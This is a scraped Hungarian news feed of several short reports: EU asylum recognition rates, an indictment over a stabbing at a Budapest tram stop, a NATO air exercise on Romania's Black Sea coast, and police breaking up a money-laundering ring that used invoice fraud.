Az ügynökség kiemelte: a kérelmek elismerési aránya májusban az átlagos 40 százalékol 45 százalékra emelkedett, a pozitív döntések közel egyenlően oszlottak meg a menekültstátusz és a kiegészítő védelem megadása között. Májusban a szíriaiak és ukrán állampolgárok kérelmeinek elismerési aránya 96, illetve 97 százalékos volt. A kérvények pozitív elismerési aránya a fehéroroszok körében 87 százalékos, az eritreaiak körében 82 százalékos, a jemeniek esetében 80 százalékos volt, míg az afgánoké az áprilisi 73 százalékhoz képest 53 százalékra zsugorodott- közölte az uniós menekültügyi ügynökség.
The post Az EU adatai szerint ez idáig közel négymillió ukrajnai kért ideiglenes védelmet az unióban appeared first on .
A Fővárosi Főügyészség azt közölte, hogy a vádlott 2021. január 16-án dél körül több ismerősével a 4/6-os villamoson utazott. A vádlott és társasága a IX. kerületben, a Mester utcai megállóban szállt le a villamosról.
A vádlott egyik ismerőse a megállóban szóváltásba keveredett a későbbi sértettel. A vádlott ekkor a szemközti peronon tartózkodott, amikor azonban a szóváltást észlelte, a villamossíneken keresztül, kezében egy késsel a sértetthez futott, majd amikor odaért hozzá, egy határozott mozdulattal mellkason szúrta a 22 éves férfit. A támadás után a vádlott az ismerőseivel együtt felszállt a megállóban álló villamosra és elhagyta a helyszínt – írták.
A mentőket és a rendőröket járókelők értesítették – tették hozzá. Az ügyészség szerint a sértett a bántalmazás következtében életveszélyes mellkasi sérülést szenvedett, az életét csak a gyors és szakszerű orvosi beavatkozás mentette meg. A Fővárosi Főügyészség a 25 éves, büntetett előéletű férfit emberölés bűntett kísérletével vádolja, és vele szemben végrehajtandó börtönbüntetés kiszabását indítványozza a vádiratban.
A főügyészség azt is indítvánozta, hogy a bíróság a vádlottal szemben korábban, más ügyben kiszabott 2 év felfüggesztett börtönbüntetés végrehajtását is rendelje el – áll a közleményben.
The post Ügyészség: vádat emeltek a villamosmegállóban késelő férfival szemben appeared first on .
A hatályos nemzetközi jogot és előírásokat tiszteletben tartó gyakorlatban részt vevő harci, légi utántöltő és korai figyelmeztető (megfigyelő) repülőgépeket az Előretolt Repülésirányító Csoport (Joint Terminal Attack Controllers – JTAC) vezeti célra egy potenciális ellenség légierejének kiiktatását szimuláló művelet során.
A gyakorlat célja, hogy ellenőrizze, hogyan tud a NATO megtervezni, összehangolni és végrehajtani egy olyan komplex nemzetközi műveletet, amely a szövetséges légteret biztosítja egy tagországot érő fenyegetés vagy támadás esetén.
A hadgyakorlat idején román és szövetséges katonai repülőgépek fognak alacsonyan repülni a Fekete-tenger partvidékén található Mihail Kogalniceanu légi támaszpont és a Midia-fok térségében – figyelmeztetett a MAPN.
Az Ukrajna elleni orosz háború kezdetét követően a NATO jelentősen megnövelte védelemi és elrettentő képességét a keleti szárnyon, szárazföldi, légi és haditengerészeti harci eszközöket és csapatokat helyezett át a térségbe, hogy megvédje a szövetség területét bármely fenyegetéssel szemben – zárul a román védelmi minisztérium közleménye.
The post A Fekete-tenger romániai partvidékén tart légi hadgyakorlatot a NATO appeared first on .
A komlói rendőrkapitányság kezdte meg még 2020 nyarán egy bűnbanda feltérképezését, amely külföldről csalásokkal megszerzett pénzek tisztára mosására specializálódott – írták.
A bűnszervezet tagjai beférkőztek külföldi cégek számítógépes rendszereibe, majd a cég egyik üzleti partnereként kiadva magukat megtévesztették a megrendelőt, akinek aztán teljesítési célszámlaként egy magyarországi társaságnak az eredeti üzleti partnerétől csak néhány karakterben eltérő bankszámlaszámát adták meg.
Ehhez kétféle módon használtak fel cégeket. Egyrészt volt olyan gazdasági társaság, amelyet kimondottan erre a célra hoztak létre. A vállalkozások csak névleg működtek, azokat csak a pénzek elrejtéséhez, elidegenítéséhez használták fel. Másrészt kapcsolatba léptek olyan cégekkel, amelyeknek bizonyos ellenérték fejében megszerezték a bankszámlaszámát, és arra utaltak át különböző összegeket, amelyeket azután felvettek – tették hozzá.
A bűnszervezetben voltak olyanok, akik a számításba jöhető cégeket keresték fel, majd tárgyaltak velük arról, hogy a bankszámláikat használhassák, mások az új vállalkozások létrehozásáért feleltek, strómanként vettek részt az üzletekben vagy a pénzt vették fel, továbbá ügyvédek is, akik a cégalapítások jogi hátterét biztosították.
Az eljárás alatt tucatnyi – többségében külföldi – sértett sérelmére elkövetett csalásból származó pénz útját sikerült azonosítani, majd az összegeket zárolni. Az összehangolt akcióknak köszönhetően a rendőrök 18 gyanúsítottat fogtak el: két nőt és 16 férfit.
A nyomozás megállapította, hogy a bűnbanda élén egy 29 éves budapesti férfi állt, míg a csapat második embere egy 49 éves, szintén budapesti férfi volt. Őket bűnszervezet tagjaként, üzletszerűen elkövetett pénzmosással gyanúsították meg a nyomozók, míg a banda többi tagjának egyebek mellett közokirat-hamisítás, csalás, illetve pénzmosás miatt kell felelniük.
A két évig zajló nyomozásnak köszönhetően több mint 2,3 milliárd forintot sikerült a rendőröknek zárolniuk, majd lefoglalniuk. A vagyon nagy része időközben már vissza is került a sértettekhez, így kártalanításuk döntő többségében megvalósulhatott.
A nyomozást pár héttel ezelőtt a nyomozóiroda befejezte, majd az ügy iratait vádemelési javaslattal megküldte a Pécsi Járási Ügyészségnek – áll a közleményben.
The post Pénzmosó bandát számoltak fel a rendőrök, kétmilliárd forintot zároltak appeared first on .